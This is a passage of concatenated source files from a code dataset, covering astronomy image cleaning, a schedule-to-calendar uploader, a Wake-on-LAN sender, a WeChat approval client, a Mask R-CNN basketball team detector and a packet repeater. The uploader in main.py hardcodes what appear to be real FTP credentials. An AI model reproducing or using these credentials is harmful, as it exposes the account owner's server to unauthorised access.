tmp_im /= im_max\n self.cleaned_im = skmed(tmp_im, selem=np.ones((self.conf.exp_seg*2+1,self.conf.exp_seg*2+1)), mask=self.mask)\n self.cleaned_im = self.cleaned_im.astype(np.float) * im_max # this is a lost cause\n\n # invert back - don't need\n #self.mask = -1 * (self.mask - 1.) \n\n # if testing, save the intermediate background image\n if self.conf.bug_check == True:\n self.save_bugcheck_im(self.cleaned_im, 'bkgnd.fits')\n \n # subtract from original data\n self.cleaned_im = self.im_data - self.cleaned_im\n\n # de-pad the array (because that is what I assume when saving)\n self.cleaned_im = self.depad_array(self.cleaned_im)\n \n\n def fix_px(self, px_val, data, weights):\n # weighted median. Masked pixels have weight zero.\n try:\n return px_val - np.average(data, weights=weights)\n except:\n return px_val\n \n \n def fix_px_med(self, px_val, data, weights):\n # weighted median. Masked pixels have weight zero.\n try:\n return px_val - ws.numpy_weighted_median(data, weights=weights)\n except:\n return px_val\n \n \n def clean_im(self):\n # correct the background via a square median filter, ignoring masked pixels\n self.cleaned_im = np.zeros((self.im_size[0], self.im_size[1]))\n for i in range(self.im_size[0]):\n for j in range(self.im_size[1]):\n # the slices are of padded arrays, and extend the number of pixels given\n # by the half-size of the filter, in self.conf.filt_size, either side of\n # the target pixel. Slice dimension is always odd. \n self.cleaned_im[i,j] = self.fix_px(self.im_data[i+self.conf.pad_px-1,j+self.conf.pad_px-1], self.im_data[i+self.conf.pad_px-1-self.conf.filt_size:i+self.conf.pad_px-1+self.conf.filt_size+1,j+self.conf.pad_px-1-self.conf.filt_size:j+self.conf.pad_px-1+self.conf.filt_size+1], self.mask[i+self.conf.pad_px-1-self.conf.filt_size:i+self.conf.pad_px-1+self.conf.filt_size+1,j+self.conf.pad_px-1-self.conf.filt_size:j+self.conf.pad_px-1+self.conf.filt_size+1])\n\n \n def depad_array(self, im_array):\n # remove the padded region\n depad_array = np.zeros((im_array.shape[0]-self.conf.pad_px*2,im_array.shape[1]-self.conf.pad_px*2))\n depad_array = im_array[self.conf.pad_px-1:im_array.shape[0]-self.conf.pad_px, self.conf.pad_px-1:im_array.shape[1]-self.conf.pad_px]\n return depad_array\n\n \n def save_clean_im(self):\n # save the cleaned image - unpad the array first. Copy original header\n hdu = pyfits.PrimaryHDU(self.cleaned_im) # don't need to depad the array, done during cleaning\n hdu.header = self.im_head\n hdu.writeto(self.clean_name, clobber=True)\n \n\n# main prog.\n\nif __name__ == '__main__':\n\n # get filename arg.\n if len(sys.argv) != 2:\n print('Error: No filename supplied.')\n print('Call as: python clean_im.py ')\n\n else:\n fname = sys.argv[1]\n\n # here are some constants that can be tuned (Using a lambda function as an empty object)\n conf = lambda: None\n conf.exp_seg = 8 # number of pixels by which to expand the seg map in mask making (conv. w. sqyare array, so need twice the required n-px expansion).\n conf.pad_px = 65 # number of pixel to pad the image with - to simplify coding.\n conf.filt_size = 64 # half-dimension of the square filter\n conf.border = 175 # depth in pixels that forms mask region around the border\n conf.clip = 500. # \n conf.bug_check = False # do we want to save bug checking images?\n print('Using config: exp_seg = {0}, pad_px = {1}, (half-)filt_size = {2}, border = {3}, clip_value = {4}, bug_check = {5}'.format(conf.exp_seg, conf.pad_px, conf.filt_size, conf.border, conf.clip, conf.bug_check))\n\n # create the VISTA image object (will read the data and set up weightmap filename\n im = video_image(fname, conf)\n\n # run sextractor\n im.run_sex()\n\n # read in the segmap and prepare it as a mask\n im.read_mask()\n\n # clean the image\n im.clean_im()\n\n # save cleaned image\n im.save_clean_im()\n \n","sub_path":"clean_im.py","file_name":"clean_im.py","file_ext":"py","file_size_in_byte":8820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506435137","text":"import PlanFetcher\nimport Plan2iCal\nimport requests\nimport re\nimport glob\nimport ftplib\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\nclass FHFPlan():\n\n def __init__(self, jg=2014, sg=7):\n\n self.__JG = jg\n self.__SG = sg\n self.__URL = \"http://www.afz-kw.brandenburg.de/main_FHF.html\"\n self.__PLAENE_ONLINE = []\n self.__PLAENE_OFFLINE = []\n self.__PLAENE_AEND = []\n self.__PLAENE_NEU = []\n self.__PLAENE_ALT = []\n\n self.__ICS_FILE = \"SG\" + str(self.__SG) + \".ics\" # Dateiname für ICS\n\n def hohle_verfuegbare_plaene(self):\n ''' Liest alle online verfügbaren Pläne und speichert sie in self.__PLAENE_ONLINE '''\n r = requests.get(self.__URL)\n html_uebersicht = r.text\n soup_uebersicht = BeautifulSoup(html_uebersicht)\n regex = \"E \"+str(self.__JG)\n uebersicht = soup_uebersicht.findAll(\"li\", text=re.compile(regex))\n for element in uebersicht:\n kw = str(element)[11:13]\n self.__PLAENE_ONLINE.append(kw)\n\n def hohle_lokale_plaene(self):\n ''' Liest alle gespeicherten Pläne und speichert sie in self.__PLAENE_OFFLINE '''\n for plan in glob.glob(\"*.xml\"):\n plan = str(plan)\n kw = plan[13:15]\n self.__PLAENE_OFFLINE.append(kw)\n\n def vergleiche_online_offline(self):\n ''' Filtert neue und alte Pläne aus '''\n for i in self.__PLAENE_ONLINE:\n if i not in self.__PLAENE_OFFLINE:\n self.__PLAENE_NEU.append(i)\n\n for i in self.__PLAENE_OFFLINE:\n if i not in self.__PLAENE_ONLINE:\n self.__PLAENE_ALT.append(i)\n\n def hohle_neue_plaene(self):\n ''' lädt neue Pläne und speichert sie als XML '''\n for i in self.__PLAENE_ONLINE:\n fetcher = PlanFetcher.PlanFetcher(int(i))\n fetcher.fetch_plan()\n fetcher.plan_to_xml()\n if i in self.__PLAENE_NEU:\n ical = Plan2iCal.Plan2iCal(self.__SG, i, self.__JG)\n ical.parse_file()\n\n def loesche_alte_plaene(self):\n ''' löscht alte XML-Dateien '''\n for i in self.__PLAENE_ALT:\n filename = \"E\" + str(self.__JG) + \"_SG\" + str(self.__SG) + \"_KW_\" + str(i) + \".xml\"\n os.remove(filename)\n\n def upload(self):\n ''' lädt ICS-Datei auf Server '''\n session = ftplib.FTP('ftp.fasty.org', 'ftp1101228-fasty2', 'Nsdqrltw$10')\n file = open(self.__ICS_FILE, 'rb') # file to send\n session.storbinary('STOR /www/' + self.__ICS_FILE, file) # send the file\n file.close() # close file and FTP\n session.quit()\n\n def cleanup(self):\n pass\n\n def main(self):\n ''' Ruft alle Funktionen in benötigter Reihenfolge auf '''\n self.hohle_verfuegbare_plaene()\n self.hohle_lokale_plaene()\n self.vergleiche_online_offline()\n self.hohle_neue_plaene()\n self.loesche_alte_plaene()\n self.cleanup()\n self.upload()\n\n\n\nif __name__ == \"__main__\":\n plan = FHFPlan(2014, 7)\n plan.main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"510725458","text":"import time\nimport itertools\nfrom os import path\nimport multiprocessing as mp,os\n\n\n\ndef process_wrapper(chunkStart, chunkSize):\n filePath = path.join(\".\\\\dataset\", \"LFM-1b_LEs.txt\")\n count = 0\n print(chunkStart)\n with open(filePath, \"r\", encoding=\"UTF-8\") as f:\n f.seek(chunkStart)\n lines = f.read(chunkSize).splitlines()\n for line in lines:\n count+=1\n\n\ndef chunkify(fname,size=24*4096):\n fileEnd = os.path.getsize(fname)\n with open(fname,'rb') as f:\n chunkEnd = f.tell()\n while True:\n chunkStart = chunkEnd\n f.seek(size,1)\n f.readline()\n chunkEnd = f.tell()\n yield chunkStart, chunkEnd - chunkStart\n if chunkEnd > fileEnd:\n break\nif __name__ == '__main__':\n#init objects\n pool = mp.Pool(mp.cpu_count())\n jobs = []\n\n #create jobs\n filePath = path.join(\".\\\\dataset\", \"LFM-1b_LEs.txt\")\n\n for chunkStart,chunkSize in chunkify(filePath):\n jobs.append( pool.apply_async(process_wrapper,(chunkStart,chunkSize)) )\n\n #wait for all jobs to finish\n for job in jobs:\n job.get()\n\n #clean up\n pool.close()","sub_path":"DataBigMiner.py","file_name":"DataBigMiner.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386557964","text":"import socket,binascii\nmac = \"3085A9997334\"#这里填写自己机器的mac地址\nmagic_data = 'FF'*6 + mac *16\nsend_data = binascii.unhexlify(magic_data)\naddress='255.255.255.255'\nport=9\ns = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\ns.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST,1)\ns.sendto(send_data,(address,port))\n\n","sub_path":"Python_Code/NetMagicOpen.py","file_name":"NetMagicOpen.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"579176101","text":"import requests\r\nfrom WeChatProject import settings\r\nfrom Approval.tools import getAccessToken\r\nimport json\r\n\r\n\r\ndef submit(subdata, UserId, templateId):\r\n print(\"submit \"+ subdata)\r\n requestURL = \"https://qyapi.weixin.qq.com/cgi-bin/oa/applyevent?access_token=ACCESS_TOKEN\".replace(\"ACCESS_TOKEN\", getAccessToken.getToken())\r\n data = {\r\n \"creator_userid\": UserId,\r\n \"template_id\": templateId,\r\n \"use_template_approver\": 0,\r\n \"approver\": [\r\n {\r\n \"attr\": 1,\r\n \"userid\": [\"821316134975\"]\r\n }\r\n ],\r\n \"notifyer\": [\"821316158175\",\"821316147075\"],\r\n \"notify_type\": 1,\r\n #\"apply_data\": subdata\r\n }\r\n\r\n data[\"apply_data\"] = json.loads(subdata)\r\n\r\n print(data)\r\n ResData = requests.post(requestURL, data=json.dumps(data))\r\n print(\"*\"*30)\r\n print(\"ykyk\")\r\n print(\"*\"*30)\r\n\r\n print(ResData.json())\r\n return ResData.json()","sub_path":"Approval/tools/submitTemplateDetail.py","file_name":"submitTemplateDetail.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"155601745","text":"import os\nimport sys\nimport json\nimport datetime\nimport numpy as np\nimport skimage.draw\nimport random\nimport itertools\nimport colorsys\nimport cv2\nfrom time import sleep\nfrom tqdm import tqdm\nimport math\nfrom PIL import Image\nfrom math import sqrt\n\n# Root directory of the project\nROOT_DIR = os.path.abspath(\"../../\")\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\n\n# Path to trained weights file\nCOCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5\")\n\n# Directory to save logs and model checkpoints, if not provided\n# through the command line argument --logs\nDEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Import COCO config\nsys.path.append(os.path.join(ROOT_DIR, \"samples/coco/\")) # To find local version\nimport coco\n\nteam_1 = [60,60,60,0]\nteam_2 = [200,200,200,0]\narbitro = [0, 102, 204, 0]\n\n# define random colors\ndef random_colors(N):\n np.random.seed(1)\n colors = [tuple(255 * np.random.rand(3)) for _ in range(N)]\n return colors\n\ndef get_mask(filename):\n\tmask = cv2.imread(filename,0)\n\tmask = mask / 255.0\n\treturn mask\n \n#apply mask to image\ndef apply_mask(image, mask, color, alpha=0.7):\n for n, c in enumerate(color):\n image[:, :, n] = np.where(mask == 1, image[:, :, n] * (1-alpha) + alpha * c, image[:, :, n])\n \n return image\n\n#apply mask to image\ndef cut_by_mask(image, mask, color=(0,255,0)):\n for n, c in enumerate(color):\n image[:, :, n] = np.where(mask == 1, image[:, :, n], c)\n \n return image\n\ndef get_dominant(img):\n global arbitro\n data = np.reshape(img, (-1,3))\n data = np.float32(data)\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 200, .1)\n flags = cv2.KMEANS_RANDOM_CENTERS\n _,labels,palette = cv2.kmeans(data,5,None,criteria,10,flags)\n _, counts = np.unique(labels, return_counts=True)\n\n best_palette = []\n best_count = 0\n\n for i, c in enumerate(palette):\n diff = np.sum(np.absolute(c[0:3] - arbitro[0:3]))\n\n #print(\"iter {}: {} with {} counts\".format(i, c, counts[i]))\n if (c.astype(np.uint8)[1] >= 250 and c.astype(np.uint8)[0] < 15 and c.astype(np.uint8)[2] < 15) or (c.astype(np.uint8) <= 30).all():\n continue\n elif diff < 150 and c[2] > 80: \n best_palette = np.asarray(arbitro[0:3])\n break\n else:\n if counts[i] > best_count: \n best_count = counts[i]\n best_palette = c\n\n return best_palette.astype(np.uint8)\n\ndef parse_colors(lst, n):\n cluster = []\n image_array = np.reshape(lst, (len(lst), 3))\n data = np.float32(image_array)\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 200, .1)\n flags = cv2.KMEANS_RANDOM_CENTERS\n _,labels,palette = cv2.kmeans(data,n,None,criteria,10,flags)\n _, counts = np.unique(labels, return_counts=True)\n\n return palette, counts\n\ndef draw_team(image, clusters, counts):\n global team_1\n global team_2\n global arbitro\n\n image = cv2.rectangle(image, (50,50), (600, 320), (150, 50, 50), 5)\n\n fusion = []\n for n, clu in enumerate(clusters):\n fusion.append(np.concatenate((clu, int(counts[n])), axis=None))\n\n fusion = np.array(fusion).astype(np.uint8)\n\n '''if team_1 == [] and team_2 == []:\n sorted_color = fusion[fusion[:,3].argsort()]\n\n squadre = sorted_color[1:]\n\n team_1 = np.append(squadre[0], 1)\n team_2 = np.append(squadre[1], 2)'''\n\n for el in fusion: \n diff_0 = np.sum(np.absolute(el[0:3] - team_1[0:3]))\n diff_1 = np.sum(np.absolute(el[0:3] - team_2[0:3]))\n diff_2 = np.sum(np.absolute(el[0:3] - arbitro[0:3]))\n\n if diff_0 < diff_1 and diff_0 < diff_2:\n team_1[3] = el[3]\n elif diff_1 < diff_0 and diff_1 < diff_2:\n team_2[3] = el[3]\n elif diff_2 < diff_0 and diff_2 < diff_1:\n arbitro[3] = el[3]\n\n #Arbitro \n color = tuple([int(arbitro[0]), int(arbitro[1]), int(arbitro[2])])\n image = cv2.rectangle(image, (80,80), (140, 140), color, -1)\n image = cv2.putText(image, \"Arbitri ({})\".format(arbitro[3]), (180, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (200,200,200), 2)\n\n #Team 1\n color = tuple([int(team_1[0]), int(team_1[1]), int(team_1[2])])\n image = cv2.rectangle(image, (80,80 + (80 * 1)), (140, 140 + (80 * 1)), color, -1)\n image = cv2.putText(image, \"Team {} ({} player)\".format(1, team_1[3]), (180, 120 + (80 * 1)), cv2.FONT_HERSHEY_COMPLEX, 1, (200,200,200), 2)\n \n #Team 2\n color = tuple([int(team_2[0]), int(team_2[1]), int(team_2[2])])\n image = cv2.rectangle(image, (80,80 + (80 * 2)), (140, 140 + (80 * 2)), color, -1)\n image = cv2.putText(image, \"Team {} ({} player)\".format(2, team_2[3]), (180, 120 + (80 * 2)), cv2.FONT_HERSHEY_COMPLEX, 1, (200,200,200), 2)\n\n return image\n\ndef getTeam(image, color):\n global team_1\n global team_2\n global arbitro\n\n diff_0 = np.sum(np.absolute(color[0:3] - team_1[0:3]))\n diff_1 = np.sum(np.absolute(color[0:3] - team_2[0:3]))\n diff_2 = np.sum(np.absolute(color[0:3] - arbitro[0:3]))\n\n ret = -1\n\n if diff_0 < diff_1 and diff_0 < diff_2:\n ret = 1\n elif diff_1 < diff_0 and diff_1 < diff_2:\n ret = 2\n elif diff_2 < diff_0 and diff_2 < diff_1:\n ret = 0\n\n return ret\n\n#Take the image and apply the mask, box, and Label\ndef display_instances(count, image, boxes, masks, ids, names, scores):\n f = open(\"det/det_player_maskrcnn.txt\", \"a\")\n\n n_instances = boxes.shape[0]\n colors = random_colors(n_instances)\n\n color_list = []\n\n if not n_instances:\n return image\n else:\n assert boxes.shape[0] == masks.shape[-1] == ids.shape[0]\n \n for i, color in enumerate(colors):\n if not np.any(boxes[i]):\n continue\n\n y1, x1, y2, x2 = boxes[i]\n label = names[ids[i]]\n score = scores[i] if scores is not None else None\n\n width = x2 - x1\n height = y2 - y1\n \n #If a player\n if score > 0.75 and label == 'person':\n mask = masks[:, :, i]\n\n #Create a masked image where the pixel not in mask is green\n image_to_edit = image.copy()\n mat_mask = cut_by_mask(image_to_edit, mask)\n\n offset_w = int(width/6)\n offset_h = int(height/3)\n offset_head = int(height/8)\n\n #Crop the image with some defined offset\n crop_img = mat_mask[y1+offset_head:y2-offset_h, x1+offset_w:x2-offset_w]\n \n '''PIL_image = Image.fromarray(crop_img.astype('uint8'), 'RGB')\n PIL_image.thumbnail((128, 128),Image.ANTIALIAS)'''\n\n #Return one single dominant color\n rgb_color = get_dominant(crop_img)\n\n #Add to the list of all the bbox color found in the single frame\n color_list.append(rgb_color)\n\n rgb_tuple = tuple([int(rgb_color[0]), int(rgb_color[1]), int(rgb_color[2])]) \n\n caption = '{} {:.2f}'.format(label, score) if score else label\n \n image = apply_mask(image, mask, rgb_tuple)\n image = cv2.rectangle(image, (x1+offset_w, y1+offset_head), (x2-offset_w, y2-offset_h), rgb_tuple, 2)\n image = cv2.putText(image, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.7, rgb_tuple, 2)\n\n team = getTeam(image, rgb_color)\n\n f.write('{},-1,{},{},{},{},{},-1,-1,-1,{}\\n'.format(count, x1, y1, x2 - x1, y2 - y1, score, team))\n\n #Group to 3 cluster all the color found in the frame's bboxes\n clusters, counts = parse_colors(color_list, 3)\n\n #Update team's stats\n image = draw_team(image, clusters, counts)\n\n '''file_name = \"splash_{:%Y%m%dT%H%M%S}.png\".format(datetime.datetime.now())\n skimage.io.imsave(file_name, image)'''\n\n f.close()\n\n return image\n\ndef video_segmentation(model, class_names, video_path):\n f = open(\"det/det_player_maskrcnn.txt\", \"w\").close()\n \n # Video capture\n vcapture = cv2.VideoCapture(video_path)\n width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = vcapture.get(cv2.CAP_PROP_FPS)\n\n length_input = int(vcapture.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Define codec and create video writer\n file_name = \"output/detection_{:%Y%m%dT%H%M%S}.avi\".format(datetime.datetime.now())\n vwriter = cv2.VideoWriter(file_name,\n cv2.VideoWriter_fourcc(*'MJPG'),\n fps, (width, height))\n \n count = 0\n success = True\n\n with tqdm(total=length_input, file=sys.stdout) as pbar:\n while success:\n success, image = vcapture.read()\n if success:\n # OpenCV returns images as BGR, convert to RGB\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n mask = get_mask('roi_mask.jpg')\n mask = np.expand_dims(mask,2)\n mask = np.repeat(mask,3,2)\n\n #Apply pitch mask to esclude the people outside\n image = image * mask\n image = image.astype(np.uint8)\n\n #Detect objects\n r = model.detect([image], verbose=0)[0]\n\n #Process objects\n frame= display_instances(count, image, r[\"rois\"], r[\"masks\"], r[\"class_ids\"], class_names, r[\"scores\"])\n # RGB -> BGR to save image to video\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n # Add image to video writer\n vwriter.write(frame)\n count += 1\n\n #Needed per the print progress\n pbar.update(1)\n sleep(0.01)\n\n vwriter.release()\n\n print(\"Saved to \", file_name)\n \nif __name__ == '__main__':\n import argparse\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n description='Train Mask R-CNN to detect balloons.')\n parser.add_argument(\"command\",\n metavar=\"\",\n help=\"'train' or 'splash'\")\n parser.add_argument('--dataset', required=False,\n metavar=\"/path/to/balloon/dataset/\",\n help='Directory of the Balloon dataset')\n parser.add_argument('--weights', required=True,\n metavar=\"/path/to/weights.h5\",\n help=\"Path to weights .h5 file or 'coco'\")\n parser.add_argument('--logs', required=False,\n default=DEFAULT_LOGS_DIR,\n metavar=\"/path/to/logs/\",\n help='Logs and checkpoints directory (default=logs/)')\n parser.add_argument('--image', required=False,\n metavar=\"path or URL to image\",\n help='Image to apply the color splash effect on')\n parser.add_argument('--video', required=False,\n metavar=\"path or URL to video\",\n help='Video to apply the color splash effect on')\n args = parser.parse_args()\n\n # Validate arguments\n if args.command == \"train\":\n assert args.dataset, \"Argument --dataset is required for training\"\n elif args.command == \"splash\":\n assert args.image or args.video,\\\n \"Provide --image or --video to apply color splash\"\n\n print(\"Weights: \", args.weights)\n print(\"Dataset: \", args.dataset)\n print(\"Logs: \", args.logs)\n\n class InferenceConfig(coco.CocoConfig):\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n config = InferenceConfig()\n config.display()\n\n # Create model\n model = modellib.MaskRCNN(mode=\"inference\", config=config,\n model_dir=args.logs)\n\n # Select weights file to load\n if args.weights.lower() == \"coco\":\n weights_path = COCO_WEIGHTS_PATH\n # Download weights file\n if not os.path.exists(weights_path):\n utils.download_trained_weights(weights_path)\n elif args.weights.lower() == \"last\":\n # Find last trained weights\n weights_path = model.find_last()\n else:\n weights_path = args.weights\n\n\n class_names = ['BG', 'basketball']\n\n # Load weights\n print(\"Loading weights \", weights_path)\n if args.weights.lower() == \"coco\":\n class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',\n 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',\n 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',\n 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\n 'kite', 'baseball bat', 'baseball glove', 'skateboard',\n 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',\n 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',\n 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',\n 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',\n 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',\n 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',\n 'teddy bear', 'hair drier', 'toothbrush']\n\n model.load_weights(weights_path, by_name=True)\n else:\n model.load_weights(weights_path, by_name=True)\n\n # Train or evaluate\n if args.command == \"detect\":\n video_segmentation(model, class_names, video_path=args.video)\n else:\n print(\"'{}' is not recognized. \"\n \"Use 'train' or 'splash'\".format(args.command))","sub_path":"player_detection.py","file_name":"player_detection.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"205442787","text":"# encoding: utf-8\n\"\"\"\n【程序14】\n题目:将一个正整数分解质因数。例如:输入90,打印出90=2*3*3*5。\n\n程序分析:对n进行分解质因数,应先找到一个最小的质数k,然后按下述步骤完成:\n(1)如果这个质数恰等于n,则说明分解质因数的过程已经结束,打印出即可。\n(2)如果n<>k,但n能被k整除,则应打印出k的值,并用n除以k的商,作为新的正整数你n,\n 重复执行第一步。\n(3)如果n不能被k整除,则用k+1作为k的值,重复执行第一步。\n\n2.程序源代码:\n\"\"\"\n\nnum = 90\n\nfor i in range(2, num + 1):\n # print(i)\n while num != i:\n if num % i == 0:\n print(str(i) + \"*\", end='')\n num = num / i\n else:\n break\nprint(int(num))\n","sub_path":"studysrc/example/exam014.py","file_name":"exam014.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"274560947","text":"'''\nClass that VIEWS will use!\n\nDo not call function inside this package!!!\n'''\nimport logging\n\nfrom server.apps.catalog.icat.sns.facade import Catalog as SNSICat\nfrom server.apps.catalog.icat.hfir.facade import Catalog as HFIRICat\n\nlogger = logging.getLogger(__name__)\n\ndef not_implemented(fargs,*args,**kwargs):\n #pylint: disable=unused-argument\n logger.warning(\"You called a Not implemented function!\")\n return None\n\n\nREGISTRY = {\n 'SNS': {\n 'get_expriments': SNSICat().get_experiments_meta,\n 'get_runs': SNSICat().get_runs_all,\n 'get_run': not_implemented,\n 'get_runs_as_table': not_implemented,\n },\n 'HFIR': {\n 'get_expriments': HFIRICat().get_experiments,\n 'get_runs': HFIRICat().get_runs, #(instrument, ipts, exp):\n 'get_runs_as_table': HFIRICat().get_runs_as_table,\n 'get_run': HFIRICat().get_run,\n }\n\n}\n\n\ndef get_expriments(facility, instrument):\n experiments = REGISTRY[facility]['get_expriments'](instrument)\n return experiments\n\ndef get_runs(facility, instrument, ipts, exp=None):\n if exp is None or exp == \"exp0\":\n runs = REGISTRY[facility]['get_runs'](instrument, ipts)\n else:\n runs = REGISTRY[facility]['get_runs'](instrument, ipts, exp)\n return runs\n\ndef get_runs_as_table(facility, instrument, ipts, exp=None):\n if exp is None or exp == \"exp0\":\n runs = REGISTRY[facility]['get_runs_as_table'](instrument, ipts)\n else:\n runs = REGISTRY[facility]['get_runs_as_table'](instrument, ipts, exp)\n return runs\n\ndef get_run(facility, instrument, ipts, file_location):\n run = REGISTRY[facility]['get_run'](instrument, ipts, file_location)\n return run\n\n\nif __name__ == \"__main__\":\n from pprint import pprint\n #experiments = REGISTRY['HFIR']['get_expriments']('CG2')\n # experiments = get_expriments('HFIR', 'CG2')\n # print(experiments)\n runs = get_runs('HFIR', 'CG3', 'IPTS-17241', 'exp381')\n pprint(runs)\n # runs = get_runs('SNS', 'TOPAZ', 'IPTS-18330')\n # pprint(runs)\n ","sub_path":"src/server/apps/catalog/icat/facade.py","file_name":"facade.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198397730","text":"# coding=utf-8\n\n\"\"\"\nThis module provides bidirectional packet switching above the transport layer.\nIt is useful for target runtime which is not able to setup a server. The target runtime simple connect the repeater\n(this module) to switch packets.\n\n* Accepted tcp packet format: [4B as length][payload]\n* Accepted websocket message format: [payload]\n* Switching pattern: [payload] <--> [payload]\n\"\"\"\n\nimport errno\nimport socket\nimport select\nimport time\nimport threading\n\nfrom poco.utils.net.simple_wss import SimpleWebSocketServer, WebSocket\nfrom poco.utils import six\nfrom poco.utils.simplerpc.transport.tcp.protocol import SimpleProtocolFilter\n\nif six.PY3:\n from queue import Queue, Empty\n from urllib.parse import urlparse\nelse:\n from Queue import Queue, Empty\n from urlparse import urlparse\n\n\ndef drain(q, to):\n total_tx = 0\n if isinstance(q, Queue):\n while True:\n try:\n d = q.get(False)\n to.send(d)\n total_tx += len(d)\n except Empty:\n break\n else:\n while q:\n d = q.pop(0)\n to.send(d)\n total_tx += len(d)\n return total_tx\n\n\nclass TcpSocket(object):\n def __init__(self, addr, rxsize=65536):\n super(TcpSocket, self).__init__()\n self.ip, self.port = addr\n if self.ip in ('', '*', '0'):\n self.ip = '0.0.0.0'\n self.s = socket.socket()\n self.s.bind((self.ip, self.port))\n self.s.listen(1)\n self.c = None\n self.rq = Queue()\n self.tq = Queue()\n self.RX_SIZE = rxsize\n self.p = SimpleProtocolFilter()\n print('server listens on (\"{}\", {}) transport socket'.format(self.ip, self.port))\n\n def update(self):\n rlist = [self.s]\n if self.c:\n rlist.append(self.c)\n r, _, _ = select.select(rlist, [], [], 0.005)\n for c in r:\n if c is self.s:\n self.c, addr = self.s.accept()\n print('accept from: {}'.format(addr))\n drain(self.tq, self)\n else:\n try:\n rxdata = self.c.recv(self.RX_SIZE)\n except socket.error as e:\n if e.errno in (errno.ECONNRESET, ):\n rxdata = ''\n else:\n continue\n\n if not rxdata:\n try:\n self.c.close()\n except socket.error:\n pass\n self.c = None\n else:\n for packet in self.p.input(rxdata):\n self.rq.put(packet)\n\n return self.recv()\n\n def recv(self):\n try:\n return self.rq.get(False)\n except Empty:\n return None\n\n def send(self, packet):\n if not self.c:\n self.tq.put(packet)\n else:\n data = self.p.pack(packet)\n self.c.sendall(data)\n\n\nclass WsSocket(object):\n def __init__(self, addr):\n super(WsSocket, self).__init__()\n self.ip, self.port = addr\n if self.ip in ('', '*', '0'):\n self.ip = '0.0.0.0'\n self.c = None\n self.rq = Queue()\n self.tq = Queue()\n\n class MyWsApp(WebSocket):\n def handleConnected(self2):\n self.c = self2\n drain(self.tq, self)\n print('server on accept. {}'.format(self.c))\n\n def handleMessage(self2):\n print('received_message from {}: {}'.format(self2.address, self2.data))\n self.rq.put(self2.data)\n\n def handleClose(self2):\n self.c = None\n print('client gone. {}'.format(self2.address))\n\n self.server = SimpleWebSocketServer(self.ip, self.port, MyWsApp)\n self.t = threading.Thread(target=self.server.serveforever)\n self.t.daemon = True\n self.t.start()\n print('server listens on (\"{}\", {}) transport websocket'.format(self.ip, self.port))\n\n def update(self):\n time.sleep(0.001)\n return self.recv()\n\n def recv(self):\n try:\n return self.rq.get(False)\n except Empty:\n return None\n\n def send(self, data):\n if not self.c:\n self.tq.put(data)\n else:\n self.c.sendMessage(data)\n\n\nclass Repeater(object):\n def __init__(self, *eps):\n super(Repeater, self).__init__()\n self.eps = [urlparse(ep) for ep in eps]\n self.transports = [self._make_transport(ep) for ep in self.eps]\n self.t = threading.Thread(target=self.loop)\n self.t.daemon = True\n self.t.start()\n\n def _make_transport(self, ep):\n if ep.scheme.startswith('ws'):\n transport = WsSocket((ep.hostname, ep.port))\n else:\n transport = TcpSocket((ep.hostname, ep.port))\n return transport\n\n def loop(self):\n print('Repeater on.')\n while True:\n for t in self.transports:\n data = t.update()\n if not data:\n continue\n\n for t2 in self.transports:\n if t2 is t:\n continue\n t2.send(data)\n\n\n# raw tcp to tcp\ndef tcp2tcp(ep1, ep2):\n RX_SIZE = 65536\n\n ep1 = urlparse(ep1)\n ep2 = urlparse(ep2)\n\n s1 = socket.socket()\n s2 = socket.socket()\n 